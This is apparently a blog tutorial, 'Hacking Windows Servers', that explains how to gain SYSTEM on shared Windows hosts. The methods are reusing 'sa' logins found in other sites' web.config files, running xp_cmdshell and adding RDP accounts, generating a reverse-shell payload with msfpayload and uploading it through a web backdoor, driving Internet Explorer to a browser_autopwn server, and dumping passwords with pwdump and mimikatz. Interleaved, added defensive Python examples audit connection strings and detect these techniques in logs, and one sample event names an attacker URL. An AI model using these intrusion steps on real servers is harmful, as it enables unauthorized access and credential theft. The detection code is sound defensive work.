Hacking Windows Servers
By: Rafay
Most of us here can hack websites and servers, but what we hate most is one error message: Access Denied! We know some methods to get past certain restrictions, such as symlink tricks and privilege escalation with local root exploits, but those get the job done only on Linux servers. What about Windows servers?
Here are some ways to bypass certain restrictions on Windows servers or to get SYSTEM privileges:
- Using the "sa" account to execute commands through MSSQL queries via the 'xp_cmdshell' stored procedure.
- Using a Meterpreter payload to get a reverse shell on the target machine.
- Using browser_autopwn. (Really...)
- Using other tools like pwdump7, mimikatz, etc.
Using the tools is the easy way, but the real fun of hacking lies in the first three methods mentioned above.
1. Using xp_cmdshell-
Most of the time on Windows servers we have read permission over the files of other IIS users, which is what this method needs.
If we are lucky enough, we will find the login credentials of the "sa" account of the MSSQL server inside the web.config file of some website.
You must be wondering why only "sa"?
Here, "sa" stands for Super Administrator and, as the name tells, this user has all possible permissions over the server.
The picture below shows a connection string containing the login credentials of the "sa" account.
Using these, we can log into the MSSQL server locally (through our web backdoor) as well as remotely. I would recommend remote access because it does not generate web server log entries that would fill the log file with our web backdoor path.
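From the defender's side, the weak point in this step is the connection string itself: a SQL login (worst of all "sa") written in clear text into a file that other application pools can read. The following is an added example for this post, not the author's code or any project's: it audits a web.config for such entries and shows the hardened form (Windows authentication, so no reusable secret lives in the file). The sample web.config is constructed for the demo; "SQL01", "MyApp" and the password are made-up values.

```python
"""Audit ASP.NET web.config connection strings for clear-text SQL logins.

Added example, not the author's code. The web.config below is constructed;
"SQL01", "MyApp" and the password are made-up values.
"""
import xml.etree.ElementTree as ET

SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="MyAppDb"
         connectionString="Data Source=SQL01;Initial Catalog=MyApp;User ID=sa;Password=P@ssw0rd!"
         providerName="System.Data.SqlClient" />
    <add name="MyAppDbSafe"
         connectionString="Data Source=SQL01;Initial Catalog=MyApp;Integrated Security=SSPI"
         providerName="System.Data.SqlClient" />
  </connectionStrings>
  <appSettings>
    <add key="Theme" value="default" />
  </appSettings>
</configuration>
"""

LOGIN_KEYS = ("user id", "uid")
SECRET_KEYS = ("password", "pwd")


def parse_connection_string(value):
    """Split 'Key=Value;Key=Value' into a dict keyed by lower-cased key."""
    parts = {}
    for segment in value.split(";"):
        key, sep, val = segment.partition("=")
        if sep:
            parts[key.strip().lower()] = val.strip()
    return parts


def audit_web_config(xml_text):
    """Return one finding per connection string that carries a SQL login.

    Windows-authenticated strings (Integrated Security) store no reusable
    secret in the file and are not reported.
    """
    findings = []
    root = ET.fromstring(xml_text)
    for add in root.iter("add"):
        conn = add.get("connectionString")
        if conn is None:
            continue  # e.g. an <appSettings> entry, not a connection string
        parts = parse_connection_string(conn)
        user = next((parts[k] for k in LOGIN_KEYS if k in parts), None)
        integrated = parts.get("integrated security", "").lower() in ("sspi", "true", "yes")
        if integrated and user is None:
            continue
        findings.append({
            "name": add.get("name"),
            "user": user,
            "plaintext_password": any(k in parts for k in SECRET_KEYS),
            # sa is the built-in server administrator login; any other stored
            # login is still a secret on disk, but its blast radius is its role
            "severity": "high" if (user or "").lower() == "sa" else "medium",
        })
    return findings


def hardened_connection_string(value):
    """Drop the SQL login and password and switch the string to Windows
    authentication; the application pool identity then gets only the
    database permissions it actually needs."""
    drop = set(LOGIN_KEYS + SECRET_KEYS) | {"integrated security"}
    kept = []
    for segment in value.split(";"):
        segment = segment.strip()
        key = segment.partition("=")[0].strip().lower()
        if not segment or key in drop:
            continue
        kept.append(segment)
    kept.append("Integrated Security=SSPI")
    return ";".join(kept)


if __name__ == "__main__":
    for finding in audit_web_config(SAMPLE_WEB_CONFIG):
        print(finding)
    print(hardened_connection_string(
        "Data Source=SQL01;Initial Catalog=MyApp;User ID=sa;Password=P@ssw0rd!"))
```

Run it against real web.config files with `audit_web_config(open(path).read())`; every "high" finding is a login that any co-tenant with read access to the file can reuse, exactly as described above.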
So, after getting the "sa" account, we can log in remotely using HeidiSQL.
HeidiSQL is an awesome tool for connecting to remote database servers. You can download it here.
After logging into the MSSQL server with the sa account, we get a list of databases and their contents.
Now we can execute commands (with administrator privileges) through MSSQL queries via xp_cmdshell.
The syntax for the query is:
xp_cmdshell '[command]'
For example, if I need to know my current privileges, I would query:
xp_cmdshell 'whoami'
This shows that I am currently NT AUTHORITY\SYSTEM, which most of us know is the highest user in the Windows user hierarchy.
Now we can go for some post-exploitation, like enabling RDP, adding accounts and allowing them to access RDP.
Note: If the server does not have the xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
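Two defensive points follow from this section. The `whoami` result is SYSTEM only because the SQL Server service itself runs as SYSTEM: xp_cmdshell runs commands as the service account, so a low-privilege service account (and leaving xp_cmdshell disabled with `sp_configure 'xp_cmdshell', 0`) limits the damage. And enabling the option is not silent: xp_cmdshell is an advanced option, so turning it on writes a 'Configuration option ... changed from 0 to 1' line for 'show advanced options' and for 'xp_cmdshell' into the SQL Server ERRORLOG, and the first call after startup logs the extended procedure being loaded. The scanner below is an added example, not the author's code; the log lines are constructed for the demo in the real ERRORLOG shape (timestamp, spid, message).

```python
"""Spot the ERRORLOG trail left by enabling and first using xp_cmdshell.

Added example, not the author's code. The ERRORLOG lines are constructed.
"""
import re

SAMPLE_ERRORLOG = """\
2013-05-12 10:01:58.10 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2013-05-12 10:02:11.45 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2013-05-12 10:02:11.47 spid55      Using 'xpstar.dll' version '2009.100.1600' to execute extended stored procedure 'xp_cmdshell'. This is an informational message only; no user action is required.
2013-05-12 10:30:00.00 spid8s      Recovery is complete. This is an informational message only. No user action is required.
2013-05-13 08:00:03.00 spid12s     Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# ERRORLOG line: "<date> <time> <spid>   <message>"
LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<spid>spid\d+s?)\s+(?P<msg>.*)$")
CONFIG_RE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")
XP_USE_RE = re.compile(r"execute extended stored procedure 'xp_cmdshell'")

WATCHED_OPTIONS = {"show advanced options", "xp_cmdshell"}


def scan_errorlog(text):
    """Return (timestamp, spid, kind, option) for every watched event.

    kind is 'enabled', 'disabled' or 'first_use'. Disables are kept so the
    timeline shows who switched the option off again.
    """
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, spid, msg = m.group("ts"), m.group("spid"), m.group("msg")
        c = CONFIG_RE.search(msg)
        if c and c.group("option") in WATCHED_OPTIONS:
            kind = "enabled" if c.group("new") != "0" else "disabled"
            alerts.append((ts, spid, kind, c.group("option")))
        elif XP_USE_RE.search(msg):
            alerts.append((ts, spid, "first_use", "xp_cmdshell"))
    return alerts


def enable_events(alerts):
    """Only the alerts that mean the shell was switched on or actually used."""
    return [a for a in alerts if a[2] in ("enabled", "first_use")]


if __name__ == "__main__":
    for alert in scan_errorlog(SAMPLE_ERRORLOG):
        print(alert)
```

The spid in each alert is the session that made the change; joining it with the server's login audit (or the default trace) gives the SQL login behind it, which in the scenario above would be sa connecting from an unexpected client.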
2. Meterpreter Payload-
This method is quite easy and comes in useful when we cannot read the files of other users but can execute commands.
Using Metasploit, generate a reverse shell payload binary. For example:
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
Now we upload this executable to the server using our web backdoor.
Run multi/handler at our end. (Make sure the ports are forwarded properly.)
Now it's time to execute the payload.
If everything goes right, we will get a Meterpreter session on the target machine, as shown below.
We can also use PHP, ASP or other payloads.
3. Browser Autopwn-
This seems an odd way of hacking a server, but I myself found it a clever way to do the job, especially in scenarios where we are allowed to execute commands but cannot run executables (our payloads) because of software restriction policies in a domain environment.
Most Windows servers have an outdated Internet Explorer, and we can exploit it if we can execute commands.
I think it is clear by now what I'm trying to explain ;)
We can start Internet Explorer from the command line and make it browse to a specific URL.
The syntax for this is:
iexplore.exe [URL]
where URL is the address of our server running browser_autopwn. After that we can use Railgun to avoid antivirus detection.
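All three methods in sections 1 to 3 share one thing a defender can see: an unusual parent-child process chain on the server. xp_cmdshell makes sqlservr.exe spawn cmd.exe, a web backdoor makes the IIS worker process w3wp.exe spawn a shell, the uploaded payload is an executable started from a web-writable directory, and the browser trick is iexplore.exe started from a shell with a URL on its command line. The detector below is an added example for this post, not the author's code; the events are a constructed sample in a simple 'time|parent image|image|command line' form, whereas in practice the same fields come from Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled. The process and path lists are illustrative assumptions to tune per host.

```python
"""Process-lineage rules for the execution paths described in sections 1-3.

Added example, not the author's code. Events are a constructed sample; the
process sets and path prefixes are assumptions for the demo.
"""
import re
from dataclasses import dataclass

SAMPLE_EVENTS = r"""
2013-05-12T10:02:12|C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\sqlservr.exe|C:\Windows\System32\cmd.exe|cmd.exe /c whoami
2013-05-12T10:05:40|C:\Windows\System32\inetsrv\w3wp.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir C:\inetpub\wwwroot
2013-05-12T10:06:02|C:\Windows\System32\cmd.exe|C:\inetpub\wwwroot\uploads\1.exe|1.exe
2013-05-12T10:09:15|C:\Windows\System32\cmd.exe|C:\Program Files\Internet Explorer\iexplore.exe|iexplore.exe http://attacker.example/
2013-05-12T11:00:00|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe
2013-05-12T11:00:05|C:\Windows\explorer.exe|C:\Program Files\Internet Explorer\iexplore.exe|iexplore.exe
"""


@dataclass
class ProcEvent:
    time: str
    parent_image: str
    image: str
    command_line: str


# Assumptions: server processes that should never need a shell, the shells
# themselves, and directories the web application can write to.
SERVER_PROCESSES = {"sqlservr.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
WEB_WRITABLE_PREFIXES = ("c:\\inetpub\\", "c:\\windows\\temp\\")
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(text):
    events = []
    for line in text.strip().splitlines():
        time, parent, image, cmdline = line.split("|", 3)
        events.append(ProcEvent(time, parent, image, cmdline))
    return events


def classify(ev):
    """Return the name of the rule an event trips, or None if it looks benign."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent in SERVER_PROCESSES and child in SHELLS:
        # sqlservr.exe -> cmd.exe is the xp_cmdshell signature (section 1);
        # w3wp.exe -> cmd.exe is a web backdoor running commands (section 2)
        return f"shell_spawned_by_{parent}"
    if ev.image.lower().startswith(WEB_WRITABLE_PREFIXES):
        # an executable started from a directory the web app can write to:
        # the uploaded payload of section 2
        return "exe_from_web_writable_path"
    if child == "iexplore.exe" and parent in SHELLS and URL_RE.search(ev.command_line):
        # the browser driven from a shell towards a URL (section 3); a user
        # double-clicking has explorer.exe as the parent and no URL argument
        return "browser_launched_from_shell_with_url"
    return None


def detect(text):
    """Run every event through the rules; return (time, rule, image) hits."""
    hits = []
    for ev in parse_events(text):
        rule = classify(ev)
        if rule:
            hits.append((ev.time, rule, ev.image))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The first rule is the one worth the least tuning: a database engine or IIS worker process spawning cmd.exe or powershell.exe is rare enough on a production server that it can page someone directly. The software restriction policy mentioned above blocks the dropped binary but not the browser launch, which is why the third rule is there.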
4. Using readily available tools-
Tools like pwdump and mimikatz can crack the passwords of Windows users.
#pwdump7 gives out the NTLM hashes of the users, which can then be cracked with John the Ripper.
The following screenshot shows NTLM hashes from pwdump7:
#mimikatz is another great tool, which extracts the plain-text passwords of users from lsass.exe. The tool is in a language other than English, so do watch tutorials on how to use it.
The following picture shows plain-text passwords from mimikatz:
You can google them to learn how to use these tools and what they actually exploit to get the job done for you.
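What mimikatz exploits here is that any process running with enough privilege can open lsass.exe and read its memory, where cached credentials live. The mitigations are LSA Protection (the RunAsPPL setting, which blocks unprotected processes from opening lsass at all) and, on newer systems, Credential Guard; the detection is to watch for handles to lsass.exe that carry the PROCESS_VM_READ right (0x0010) from processes that have no business holding them. The check below is an added example, not the author's code; the events are constructed in the shape of Sysmon Event ID 10 (source image, target image, GrantedAccess mask), and the allow-list of legitimate readers is an assumption to tune per host.

```python
"""Flag processes that obtain memory-read access to lsass.exe.

Added example, not the author's code. Events are constructed in the shape
of Sysmon Event ID 10; the allow-list is an assumption.
"""
PROCESS_VM_READ = 0x0010  # Win32 access right needed to read another process's memory

# Assumption: readers expected on this host (e.g. the AV engine).
ALLOWED_READERS = {
    r"c:\program files\windows defender\msmpeng.exe",
}

# (source image, target image, GrantedAccess) -- constructed sample
SAMPLE_ACCESS_EVENTS = [
    (r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\lsass.exe", 0x1400),
    (r"C:\Program Files\Windows Defender\MsMpEng.exe", r"C:\Windows\System32\lsass.exe", 0x1FFFFF),
    (r"C:\inetpub\wwwroot\uploads\mk.exe", r"C:\Windows\System32\lsass.exe", 0x1010),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\notepad.exe", 0x1010),
]


def is_lsass(path):
    return path.rsplit("\\", 1)[-1].lower() == "lsass.exe"


def suspicious_lsass_access(events):
    """Return (source image, access mask as hex) for every non-allow-listed
    process that opened lsass.exe with PROCESS_VM_READ set."""
    hits = []
    for source, target, access in events:
        if not is_lsass(target):
            continue
        if not access & PROCESS_VM_READ:
            continue  # e.g. 0x1400: query-information rights only, cannot read memory
        if source.lower() in ALLOWED_READERS:
            continue
        hits.append((source, hex(access)))
    return hits


if __name__ == "__main__":
    for hit in suspicious_lsass_access(SAMPLE_ACCESS_EVENTS):
        print(hit)
```

Testing on the access-right bit rather than on a list of known masks keeps the rule valid when a tool changes which combination it requests; the allow-list, not the mask, is where the host-specific tuning belongs.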